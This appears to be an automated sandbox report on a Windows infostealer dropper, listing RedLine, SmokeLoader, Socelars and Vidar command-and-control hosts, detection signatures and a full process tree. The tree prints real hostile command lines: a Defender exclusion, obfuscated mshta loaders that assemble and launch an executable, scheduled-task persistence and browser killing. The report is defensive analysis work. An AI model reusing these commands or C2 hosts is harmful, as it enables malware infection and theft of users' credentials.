Overview

overview

10

Static

static

01a53007f9...68.exe

windows10_x64

10

022e3c30a1...66.exe

windows10_x64

10

02ca2b5bb7...35.exe

windows10_x64

10

0d69cafe70...cd.exe

windows10_x64

10

0df647f0a2...bc.exe

windows10_x64

10

1df367eead...2c.exe

windows10_x64

10

1e083736ae...33.exe

windows10_x64

10

1e662d9025...7d.exe

windows10_x64

10

2010009ff5...59.exe

windows10_x64

10

243379992d...93.exe

windows10_x64

10

2d63a14e4a...1a.exe

windows10_x64

10

30e6815ae0...51.exe

windows10_x64

1

364d3b0e94...fa.exe

windows10_x64

10

3a4e2dfbd7...00.exe

windows10_x64

10

4a4a606501...75.exe

windows10_x64

10

4d89b00768...c0.exe

windows10_x64

10

5524bfd826...5f.exe

windows10_x64

10

582bd655f4...9b.exe

windows10_x64

10

588b74dc8e...70.exe

windows10_x64

10

609accbb14...2b.exe

windows10_x64

10

620a9a3efa...11.exe

windows10_x64

10

623bb62b2b...7c.exe

windows10_x64

10

642c69b710...bc.exe

windows10_x64

10

6e18165c4a...34.exe

windows10_x64

10

78a82aa6d4...cd.exe

windows10_x64

8

809ed9e2d0...41.exe

windows10_x64

10

82bf2273f6...2f.exe

windows10_x64

10

9bd142ecfe...06.exe

windows10_x64

10

9c4880a98c...82.exe

windows10_x64

10

9d608ed375...11.exe

windows10_x64

10

9ed5bbddf1...6e.exe

windows10_x64

10

a1dad4a83d...c4.exe

windows10_x64

10

Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    185s
  • max time network
    341s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    10-11-2021 14:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806.exe

  • Size

    3.9MB

  • MD5

    a4d23ac3c7172b9aa02e35b6bf0fd21f

  • SHA1

    0326aab7deddfefc048c9a67ac9ce4ee14ea9003

  • SHA256

    9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806

  • SHA512

    9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10

Score
10/10
redlinesmokeloadersocelarsvidaranisheaspackv2backdoorevasioninfostealerspywarestealersuricatatrojan

Malware Config

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

she

C2

135.181.129.119:4805

Extracted

Family

redline

Botnet

ANI

C2

45.142.215.47:27643

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/
rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

    stealersocelars
  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata
  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata
  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata
  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata
  • suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

    suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil

    suricata
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 28 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 11 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 8 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 23 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Kills process with taskkill 7 IoCs
    evasion
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 20 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
    evasionspywaretrojan
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies registry class
    PID:3980
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:4512
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
    • Modifies registry class
    PID:2688
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    1⤵
      PID:2676
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2640
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2440
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2404
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1916
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1432
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1372
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1184
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1156
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:928
                      • C:\Users\Admin\AppData\Roaming\tefvgti
                        C:\Users\Admin\AppData\Roaming\tefvgti
                        2⤵
                        • Executes dropped EXE
                        PID:4124
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:320
                      • C:\Users\Admin\AppData\Local\Temp\9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806.exe
                        "C:\Users\Admin\AppData\Local\Temp\9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1284
                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:68
                          • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\setup_install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:3932
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3224
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                5⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1560
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3344
                              • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun152bab5a2de.exe
                                Sun152bab5a2de.exe
                                5⤵
                                • Executes dropped EXE
                                PID:1340
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:60
                              • C:\Users\Admin\AppData\Local\Temp\7zS440CA0B6\Sun15dbd675f871ca.exe
                                Sun15dbd675f871ca.exe
                                5⤵
                                • Executes dropped EXE
                                PID:2304
                                • C:\Users\Admin\Pictures\Adobe Films\Ikvb8boSTMjFPqK3cUcLSryn.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\Ikvb8boSTMjFPqK3cUcLSryn.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4660
                                • C:\Users\Admin\Pictures\Adobe Films\0zNiP4XUIAiYHtXs33z1wEfu.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\0zNiP4XUIAiYHtXs33z1wEfu.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4520
                                • C:\Users\Admin\Pictures\Adobe Films\YL4ZftdgMR8ZMVH_lr6m46jV.exe
                                  "C:\Users\Admin\Pictures\Adobe Films\YL4ZftdgMR8ZMVH_lr6m46jV.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of SetThreadContext
                                  PID:2820
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                    7⤵
                                      PID:4716
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2820 -s 564
                                      7⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Program crash
                                      PID:4988
                                  • C:\Users\Admin\Pictures\Adobe Films\gKNgIPrRQszzE3VlOXC7Tw1S.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\gKNgIPrRQszzE3VlOXC7Tw1S.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    • Checks SCSI registry key(s)
                                    • Suspicious behavior: MapViewOfSection
                                    PID:4888
                                  • C:\Users\Admin\Pictures\Adobe Films\tlqxHPd9PU88UcXiGPP1JWhX.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\tlqxHPd9PU88UcXiGPP1JWhX.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4880
                                  • C:\Users\Admin\Pictures\Adobe Films\S662jTvJy89BKYxj6ofyHdgA.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\S662jTvJy89BKYxj6ofyHdgA.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4920
                                  • C:\Users\Admin\Pictures\Adobe Films\JzxJr1JbhLUxlgPWKCX4sZOw.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\JzxJr1JbhLUxlgPWKCX4sZOw.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4708
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\JzxJr1JbhLUxlgPWKCX4sZOw.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\JzxJr1JbhLUxlgPWKCX4sZOw.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                      7⤵
                                        PID:4772
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\JzxJr1JbhLUxlgPWKCX4sZOw.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\JzxJr1JbhLUxlgPWKCX4sZOw.exe" ) do taskkill -im "%~NxK" -F
                                          8⤵
                                            PID:1324
                                            • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                              8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                              9⤵
                                              • Executes dropped EXE
                                              PID:1356
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                10⤵
                                                  PID:4460
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                    11⤵
                                                      PID:1568
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                    10⤵
                                                      PID:5636
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                        11⤵
                                                          PID:3196
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                            12⤵
                                                              PID:5916
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                              12⤵
                                                                PID:5284
                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                msiexec.exe -y .\N3V4H8H.SXY
                                                                12⤵
                                                                  PID:7064
                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                            taskkill -im "JzxJr1JbhLUxlgPWKCX4sZOw.exe" -F
                                                            9⤵
                                                            • Kills process with taskkill
                                                            PID:2968
                                                    • C:\Users\Admin\Pictures\Adobe Films\QTbhafdXQtJXvTzRmlQQFg5f.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\QTbhafdXQtJXvTzRmlQQFg5f.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:3976
                                                    • C:\Users\Admin\Pictures\Adobe Films\c1pT9IErBbBURNwL0WBN4zuQ.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\c1pT9IErBbBURNwL0WBN4zuQ.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Drops file in Program Files directory
                                                      PID:5008
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                        7⤵
                                                        • Creates scheduled task(s)
                                                        PID:1884
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                        7⤵
                                                        • Creates scheduled task(s)
                                                        PID:4692
                                                      • C:\Users\Admin\Documents\LA2mXxkVAlHqBhoH6nJwRv30.exe
                                                        "C:\Users\Admin\Documents\LA2mXxkVAlHqBhoH6nJwRv30.exe"
                                                        7⤵
                                                          PID:3568
                                                          • C:\Users\Admin\Pictures\Adobe Films\8dU0joEFloV9bOB_QuTjj5N9.exe
                                                            "C:\Users\Admin\Pictures\Adobe Films\8dU0joEFloV9bOB_QuTjj5N9.exe"
                                                            8⤵
                                                              PID:5216
                                                            • C:\Users\Admin\Pictures\Adobe Films\uyX8OLa5PUvX0qsC9NQ8YWG_.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\uyX8OLa5PUvX0qsC9NQ8YWG_.exe"
                                                              8⤵
                                                                PID:6112
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 664
                                                                  9⤵
                                                                  • Program crash
                                                                  PID:5912
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 704
                                                                  9⤵
                                                                  • Program crash
                                                                  PID:4972
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 708
                                                                  9⤵
                                                                  • Program crash
                                                                  PID:3152
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 708
                                                                  9⤵
                                                                  • Program crash
                                                                  PID:5284
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 1128
                                                                  9⤵
                                                                  • Program crash
                                                                  PID:6932
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 1120
                                                                  9⤵
                                                                  • Program crash
                                                                  PID:6028
                                                              • C:\Users\Admin\Pictures\Adobe Films\OnmaK0e3WhYRMVNssIzRs9tN.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\OnmaK0e3WhYRMVNssIzRs9tN.exe"
                                                                8⤵
                                                                  PID:5188
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                    9⤵
                                                                      PID:7020
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill /f /im chrome.exe
                                                                        10⤵
                                                                        • Kills process with taskkill
                                                                        PID:6464
                                                                  • C:\Users\Admin\Pictures\Adobe Films\SQmICrE7rbvnbbYEAOlHoXl5.exe
                                                                    "C:\Users\Admin\Pictures\Adobe Films\SQmICrE7rbvnbbYEAOlHoXl5.exe"
                                                                    8⤵
                                                                      PID:3136
                                                                    • C:\Users\Admin\Pictures\Adobe Films\xg03lfTUatEF5g8UyIKr5iOy.exe
                                                                      "C:\Users\Admin\Pictures\Adobe Films\xg03lfTUatEF5g8UyIKr5iOy.exe"
                                                                      8⤵
                                                                        PID:5192
                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\xg03lfTUatEF5g8UyIKr5iOy.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\xg03lfTUatEF5g8UyIKr5iOy.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                          9⤵
                                                                            PID:2652
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\xg03lfTUatEF5g8UyIKr5iOy.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\xg03lfTUatEF5g8UyIKr5iOy.exe" ) do taskkill -f -iM "%~NxM"
                                                                              10⤵
                                                                                PID:5528
                                                                                • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                  ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                  11⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:2028
                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                    "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                    12⤵
                                                                                      PID:6308
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                        13⤵
                                                                                          PID:6860
                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                        "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                        12⤵
                                                                                          PID:1108
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                            13⤵
                                                                                              PID:5700
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                14⤵
                                                                                                  PID:5568
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                  14⤵
                                                                                                    PID:7140
                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                    msiexec -Y ..\lXQ2g.WC
                                                                                                    14⤵
                                                                                                      PID:7156
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill -f -iM "xg03lfTUatEF5g8UyIKr5iOy.exe"
                                                                                                11⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:6576
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\ykW1DLl0qleDAPKdvBeMZJXI.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\ykW1DLl0qleDAPKdvBeMZJXI.exe"
                                                                                          8⤵
                                                                                            PID:1700
                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                              9⤵
                                                                                                PID:6428
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\0dEZXrZetz9fhxj3s3F4FwfK.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\0dEZXrZetz9fhxj3s3F4FwfK.exe"
                                                                                              8⤵
                                                                                                PID:4900
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\yG0IV5TXxRJb7orNsZqjML0W.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\yG0IV5TXxRJb7orNsZqjML0W.exe"
                                                                                                8⤵
                                                                                                  PID:3524
                                                                                                • C:\Users\Admin\Pictures\Adobe Films\BpYs6B466cpvMUmn1JxmBXRu.exe
                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\BpYs6B466cpvMUmn1JxmBXRu.exe"
                                                                                                  8⤵
                                                                                                    PID:4960
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-L9UT6.tmp\BpYs6B466cpvMUmn1JxmBXRu.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-L9UT6.tmp\BpYs6B466cpvMUmn1JxmBXRu.tmp" /SL5="$303E0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\BpYs6B466cpvMUmn1JxmBXRu.exe"
                                                                                                      9⤵
                                                                                                        PID:1748
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-MFSDK.tmp\DYbALA.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-MFSDK.tmp\DYbALA.exe" /S /UID=2709
                                                                                                          10⤵
                                                                                                            PID:4320
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\40-bf7f4-128-c8098-18bcf94e6c7a2\Hupyletosa.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\40-bf7f4-128-c8098-18bcf94e6c7a2\Hupyletosa.exe"
                                                                                                              11⤵
                                                                                                                PID:5392
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9b-ab812-fe8-5049a-b1e14ad52f6c5\Dakydaecafo.exe
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\9b-ab812-fe8-5049a-b1e14ad52f6c5\Dakydaecafo.exe"
                                                                                                                11⤵
                                                                                                                  PID:5464
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\P5Z7TM25lUpya_Cfr9Rjf3fZ.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\P5Z7TM25lUpya_Cfr9Rjf3fZ.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4212
